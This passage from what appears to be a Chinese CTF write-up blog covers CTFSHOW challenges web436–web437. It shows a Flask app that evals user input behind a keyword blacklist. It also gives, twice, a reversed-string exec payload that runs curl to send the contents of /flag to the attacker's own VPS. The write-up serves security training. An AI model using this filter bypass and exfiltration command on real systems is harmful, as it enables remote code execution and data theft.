<p>可以看到这题把<code>getattr</code>过滤了，不过不影响我们做题，步骤跟上题一样</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(exec(&#x27;)&quot;`galf/ tac`=p?反转端口:你的反转vps地址//:ptth lruc&quot;(metsys.so ;so tropmi&#x27;[::-1]))</span><br></pre></td></tr></table></figure>

<h3 id="web437"><a href="#web437" class="headerlink" title="web437"></a>web437</h3><p>跟上题一样的方法</p>
<p>爆出源码看看</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Q2B</span>(<span class="params">uchar</span>):</span><br><span class="line">    inside_code = <span class="built_in">ord</span>(uchar)</span><br><span class="line">    <span class="keyword">if</span> inside_code == <span class="number">0x3000</span>:</span><br><span class="line">        inside_code = <span class="number">0x0020</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        inside_code -= <span class="number">0xfee0</span></span><br><span class="line">    <span class="keyword">if</span> inside_code &lt; <span class="number">0x0020</span> <span class="keyword">or</span> inside_code &gt; <span class="number">0x7e</span>: </span><br><span class="line">        <span class="keyword">return</span> uchar</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">chr</span>(inside_code)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">stringQ2B</span>(<span class="params">ustring</span>):</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;&quot;</span>.join([Q2B(uchar) <span class="keyword">for</span> uchar <span class="keyword">in</span> ustring])</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">    	code = stringQ2B(code)</span><br><span class="line">    	<span class="keyword">if</span> <span class="string">&#x27;\\u&#x27;</span> <span class="keyword">in</span> code:</span><br><span class="line">    		<span class="keyword">return</span> <span class="string">&#x27;hacker?&#x27;</span></span><br><span class="line">    	reg = re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|open|system|read|eval|builtins|curl|_|getattr&#x27;</span>)</span><br><span class="line">    	<span class="keyword">if</span> reg.search(code)==<span class="literal">None</span>:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>多了个<code>if &#39;\\u&#39; in code</code>，<code>\\u</code> 是一种表示 <strong>Unicode 编码字符</strong> 的转义序列</p>
<p><strong>具体说明：</strong></p>
<ul>
<li>在字符串里，<code>\u</code> 后面跟着 4 位十六进制数字，用来表示一个 Unicode 字符的编码</li>
<li>比如 <code>\u4f60</code> 表示汉字 “你”，<code>\u597d</code> 表示汉字 “好”</li>
<li>这种写法在很多编程语言和数据格式（如 JSON）中都用来表达非 ASCII 字符</li>
</ul>
<p>这次过滤对我们影响不大，可以继续用上题的步骤</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(exec(&#x27;)&quot;`galf/ tac`=p?反转端口:你的反转vps地址//:ptth lruc&quot;(metsys.so ;so tropmi&#x27;[::-1]))</span><br></pre></td></tr></table></figure>

</div><div class="article-licensing box"><div class="licensing-title"><p>CTFSHOW | 其他篇题解（二）web417 - web437</p><p><a href="https://waynejoon.github.io/posts/ctfshow-others-2-web417-web437/">https://waynejoon.github.io/posts/ctfshow-others-2-web417-web437/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>WayneJoon.H</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2025-08-22</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="level is-mobile is-flex"><div class="article-tags is-size-7 is-uppercase"><i class="fas fa-tags has-text-grey"></i> <a class="link-muted" rel="tag" href="/tags/CTFSHOW/">CTFSHOW </a></div></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/posts/ctfshow-others-3-web438-web460/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">CTFSHOW | 其他篇题解（三）web438 - web460</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/posts/ctfshow-others-1-web396-web416/"><span class="level-item">CTFSHOW | 其他篇题解（一）web396 - web416</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="/img/waynejoon.jpg" alt="WayneJoon.H"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">WayneJoon.H</p><p class="is-size-6 is-block">记录学习生活</p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives/"><p class="title">38</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories/"><p class="title">7</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags/"><p class="title">8</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/waynejoon" target="_blank" rel="me noopener">关注我</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Github" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="RSS" href="/atom.xml"><i class="fas fa-rss"></i></a></div></div></div><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#前言"><span class="level-left"><span class="level-item">1</span><span class="level-item">前言</span></span></a></li><li><a class="level is-mobile" href="#题目列表"><span class="level-left"><span class="level-item">2</span><span class="level-item">题目列表</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#web417"><span class="level-left"><span class="level-item">2.1</span><span class="level-item">web417</span></span></a></li><li><a class="level is-mobile" href="#web418"><span class="level-left"><span class="level-item">2.2</span><span class="level-item">web418</span></span></a></li><li><a class="level is-mobile" href="#web419"><span class="level-left"><span class="level-item">2.3</span><span class="level-item">web419</span></span></a></li><li><a class="level is-mobile" href="#web420"><span class="level-left"><span class="level-item">2.4</span><span class="level-item">web420</span></span></a></li><li><a class="level is-mobile" href="#web421"><span class="level-left"><span class="level-item">2.5</span><span class="level-item">web421</span></span></a></li><li><a class="level is-mobile" href="#web422"><span class="level-left"><span class="level-item">2.6</span><span class="level-item">web422</span></span></a></li><li><a class="level is-mobile" href="#web423"><span class="level-left"><span class="level-item">2.7</span><span class="level-item">web423</span></span></a></li><li><a class="level is-mobile" href="#web424"><span class="level-left"><span class="level-item">2.8</span><span class="level-item">web424</span></span></a></li><li><a class="level is-mobile" href="#web425"><span class="level-left"><span class="level-item">2.9</span><span class="level-item">web425</span></span></a></li><li><a class="level is-mobile" href="#web426"><span class="level-left"><span class="level-item">2.10</span><span class="level-item">web426</span></span></a></li><li><a class="level is-mobile" href="#web427"><span class="level-left"><span class="level-item">2.11</span><span class="level-item">web427</span></span></a></li><li><a class="level is-mobile" href="#web428"><span class="level-left"><span class="level-item">2.12</span><span class="level-item">web428</span></span></a></li><li><a class="level is-mobile" href="#web429"><span class="level-left"><span class="level-item">2.13</span><span class="level-item">web429</span></span></a></li><li><a class="level is-mobile" href="#web430"><span class="level-left"><span class="level-item">2.14</span><span class="level-item">web430</span></span></a></li><li><a class="level is-mobile" href="#web431"><span class="level-left"><span class="level-item">2.15</span><span class="level-item">web431</span></span></a></li><li><a class="level is-mobile" href="#web432"><span class="level-left"><span class="level-item">2.16</span><span class="level-item">web432</span></span></a></li><li><a class="level is-mobile" href="#web433"><span class="level-left"><span class="level-item">2.17</span><span class="level-item">web433</span></span></a></li><li><a class="level is-mobile" href="#web434"><span class="level-left"><span class="level-item">2.18</span><span class="level-item">web434</span></span></a></li><li><a class="level is-mobile" href="#web435"><span class="level-left"><span class="level-item">2.19</span><span class="level-item">web435</span></span></a></li><li><a class="level is-mobile" href="#web436"><span class="level-left"><span class="level-item">2.20</span><span class="level-item">web436</span></span></a></li><li><a class="level is-mobile" href="#web437"><span class="level-left"><span class="level-item">2.21</span><span class="level-item">web437</span></span></a></li></ul></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/">WayneJH</a><p class="is-size-7"><span>&copy; 2026 WayneJoon.H</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">共<span id="busuanzi_value_site_uv">0</span>个访客</span></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="GitHub" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-cn");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script data-pjax src="/js/column.js"></script><script data-pjax src="/js/busuanzi-fix.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script data-pjax src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.min.js"></script><script src="/js/pjax.js"></script><!--!--><!--!--><!--!--><script data-pjax src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script data-pjax src="/js/insight.js" defer></script><script data-pjax>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>